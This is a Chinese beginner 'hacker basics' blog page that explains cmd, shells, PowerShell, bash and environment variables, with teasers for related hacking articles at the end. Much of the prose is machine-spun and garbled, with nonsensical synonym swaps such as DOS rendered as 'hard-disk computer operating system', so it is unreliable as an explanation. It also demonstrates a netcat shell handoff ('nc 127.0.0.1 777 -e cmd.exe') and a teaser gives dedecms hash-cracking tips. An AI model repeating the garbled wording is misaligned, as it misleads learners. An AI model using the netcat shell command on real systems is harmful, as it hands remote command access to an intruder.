Windows10电脑上和一台KaliLinuxvm虚拟机

hacker5年前黑客文章815

在学习培训这一系列产品以前,请自主提前准备一台Windows10的电脑上和一台Kali Linuxvm虚拟机,假如你肯定不会安裝Kali Linuxvm虚拟机也没事儿,要看会你懂得的就可以了;

 

一、“cmd”详细说明

大家之一个 *** 黑客基本专业术语是cmd。cmd得话有很多种多样,像Dos下的cmd,Linux下的Bash, *** 黑客外溢反跳以后获得的页面,英语一般会把他们统一称之为shell,大家一一来表述下。

 

Dos是硬盘电脑操作系统的简称,是PC机上的一类电脑操作系统。从1981年直至1996年的十五年间,硬盘电脑操作系统在IBM PC兼容机销售市场中占据至关重要的影响力。并且,倘若把一部分以DOS为基本的Microsoft Windows版本号,如Windows 95、Windows 98和Windows Me等都算上得话,那麼其商业服务使用寿命最少能够算到2001年。微软公司的全部事后版本号中,硬盘电脑操作系统淘汰了,可是作为它的机壳页面,cmd却保存了出来。

 

在WIN10系统下按住WIN X键,就可以开启命令行界面了。WIN X

 

你开启的命令行界面,实际上是运作了DOS下的一个指令cmd.exe,供你键入DOS下其他指令给系统软件的。你一直在指令页面里再键入一次cmd.exe,依然会出現一个命令行界面。cmd.exe

 

大家再用 *** 黑客界的瑞士军刀来做一次反跳仿真模拟:

用指令:nc -vvlp 777 来监视该机的777端口号,那麼你再开一个cmd对话框,运行命令:nc 127.0.0.1 777 -e cmd.exe,那麼原先监视的页面里便会出現命令行界面了,在 *** 黑客界这类cmd一般被别人称之为shell。

nc -vvlp 777

nc 127.0.0.1 777 -e cmd.exe

 

cmd程序流程微软公司从来没有舍弃过,一直在升級。并且每一次升級WINdows,微软公司基本上都是提升好多个DOS小指令。大家平常人将会不常见,可是在IT维护保养工作人员或计算机管理员手里,DOS命令是务必要学的。

POWERSHELL尽管是一门计算机语言,可是从它的取名,你也就能够看得出微软公司的欲望。power shell,非常SHELL,含意相近非常DOS。DOS和POWESHELL算作一个承继和联接。

你一直在命令行界面里立即键入powershell,便会进到powershell页面。powershell

 

实际上再严苛一点讲,cmd(shell)在IT界一般特指Linux的cmd了。

Linuxcmd也是微信小程序多种多样,主要参数也多,乃至还能有强劲的程序编写指令(bash)适用。shell是一种通用性叫法,bash是shell的一种案例。你一直在Kali下开启终端设备,便是打开了Linux的cmd。bash

 

不论是DOS還是LINUX,cmd指令全是分內部指令和外部命令的。

在DOS下,假如找不着这一exe,你却能运作它,像dir,那麼便是內部指令;能寻找的exe便是外部命令了。

在LIINUX下可以用enable -a来列举全部內部指令:enable -a

 

enable 也可以分辨出哪一个指令是是非非內部指令:并不是shell内建

 

二、什么叫环境变量?

环境变量一般就是指在电脑操作系统中用于特定电脑操作系统软件环境的一些主要参数,例如临时文件夹部位和系统软件文件夹名称部位这些。这一点有点儿类似DOS阶段的默认设置相对路径,如果你运作一些程时序除开在当今文件夹名称中找寻外,还会继续到设定的默认设置相对路径中去搜索。

例如环境变量中的“Path”便是一个自变量,里边储存了一些常用命令所储放的文件目录相对路径。我还在之前的文章内容中给你安裝过python,安裝结束以后在不一样文件目录下都能够启用python指令,这就是环境变量里的path在起功效。

 

假如要查询该机的环境变量,你能在cmd奠定set指令:查询该机的环境变量set指令

 

在set指令里的每一个自变量都能够用%标记加在前后左右,随后用echo指令里显示信息出去。

举个事例,像echo %ALLUSERSPROFILE%echo %ALLUSERSPROFILE%

你也能够在WIN10“系统属性”那里来设定环境变量,用用户界面来修改环境变量。windows10系统属性环境变量

 

环境变量分客户环境变量和系统软件环境变量的。

客户环境变量修改只对当今客户有效,系统软件自然环境 自变量修改对全部客户都起功效。可是修改了环境变量以后,一定要重新启动设备,新设定的环境变量才起功效。

 

再举一个事例来表明临时性环境变量,我在这假定你设备配有python2.7,装在c:/python2.7,你要配有sqlmap,装在d:/sqlmap

 

1、假如python沒有让你设备全自动配备好环境变量,你全相对路径启用就需要实行c:/python27/python.exe d:/sqlmap/sqlmap.py,可是确实不是便捷了,要打较长的指令,实际上为何无需DOS下的path指令呢?

 

2、系统软件沒有配备好,你能自身选建一个临时性环境变量呀。

指令以下:

path=c:/python27;d:/sqlmap

 

3、随后立即运作 sqlmap.py 就能实行了。可是那样做必须每一次先手动式实行一次path指令。临时性环境变量

 

小结:

环境变量有可能会遭受 *** 黑客的恰当运用,能够用于提权。我之前写过一篇文章《黑客渗透如何“巧妙利用环境变量”来提权?》,你能看下是怎样遭受 *** 黑客们运用的。

*** 黑客基本专业术语这一系列产品,真的是彻底给0基本的要学 *** 黑客的新手提前准备的了,假如你再学不懂,哪你也就舍弃 *** 黑客之途吧。

标签: 黑客技术

相关文章

Yersinia设计方案

Yersinia设计方案

什么叫Yersinia? Yersinia设计方案用以运用各种各样网络层协议的一些缺点。它也被觉得是能用的最有使用价值和最常见的安全工器具之一。   Yersinia随意吗 ? 是的,这一...

动易CMS拿shell 图文教程

动易CMS拿shell 图文教程

 原创作者:泪舞   Qq:8109217   ( 转载请写上作者名 ) 动易CMS、我相信大家都不陌生吧?互联网很多企业站点都是用的动易...

dedecms找后台和解密注意事项

解密:织梦密码是cmd5加密,为20位,去掉前三位与后一位。 后台:默认的是dede/login.php 有时后台也可以利用http://chncto.com/include/fcke...

Netsparker在“Web程序运行安全性扫描仪程序流程”

Netsparker在“Web程序运行安全性扫描仪程序流程”

什么叫Netsparker? Netsparker在“Web程序运行安全性扫描仪程序流程”的黑客工具类型中标识,该类型致力于发觉和审批Web引入和跨站脚本制作(XSS)概率等Web程序运行系统漏洞。...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫openssh? OpenSSH是一个十分火爆的SSH网络信息安全专用工具,被数千万的互联网客户应用。一切n00b都能够对你说,像telnet,rlogin和ftp那样的协议书是不安全的。Op...

在渗透测试中使用fuzz技术

在渗透测试中使用fuzz技术

前言:本文翻译自sans.org,有删节。在学习sulley的过程中发现中文参考资料很少,所以抛砖引玉翻译一下,希望对学习协议fuzz测试的同学有帮助。本文适合作为学习sulley协议测试过程中参...